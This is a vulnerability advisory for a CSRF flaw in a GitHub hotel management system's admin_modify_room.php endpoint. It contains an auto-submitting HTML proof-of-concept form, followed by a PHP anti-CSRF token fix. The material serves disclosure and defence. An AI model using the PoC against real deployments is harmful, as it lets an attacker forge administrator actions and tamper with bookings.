[Description]
Hotel-Management-System was discovered to contain a cross-site request forgery (CSRF) vulnerability via the URI /admin_modify_room.php.
[Vulnerability Type]
Cross-site request forgery (CSRF)
[Vendor of Product]
Hotel-Management-System, https://github.com/vaibhavverma9999/Hotel-Management-System
[Affected Product Code Base]
commit <= 91caab8e505a1791780594d23408fb31fcc272cc
[Impact Escalation of Privileges]
true
[POC]
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/admin_modify_room.php" method="POST">
<input type="hidden" name="book_id" value="10017" />
<input type="hidden" name="checkout" value="2024-07-20" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
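
One way to close this hole, shown as an added example that is not code from the Hotel-Management-System repository: a session-bound anti-CSRF token checked before the POST to /admin_modify_room.php is processed. The helper names csrf_token() and csrf_verify(), the csrf_token field name, and the use of PHP sessions for the admin login are assumptions.

```php
<?php
// Added example: session-bound CSRF token check for a state-changing admin endpoint.
// csrf_token() and csrf_verify() are hypothetical helpers, not project code.
declare(strict_types=1);

function csrf_token(): string
{
    // One token per session, generated from a CSPRNG.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_verify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // Reject missing or non-string values; compare in constant time.
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// SameSite keeps the browser from attaching the session cookie to cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Validate the two parameters the PoC submits before they are used.
    $bookId = filter_input(INPUT_POST, 'book_id', FILTER_VALIDATE_INT);
    $checkout = DateTimeImmutable::createFromFormat('!Y-m-d', (string)($_POST['checkout'] ?? ''));
    if ($bookId === false || $bookId === null || $checkout === false) {
        http_response_code(400);
        exit('Invalid input');
    }
    // ... existing room-modification logic runs here ...
}
?>
<form action="admin_modify_room.php" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <!-- existing book_id and checkout fields -->
</form>
```

With this check in place, the auto-submitting form in the PoC is answered with HTTP 403 because it cannot supply the token stored in the administrator's session.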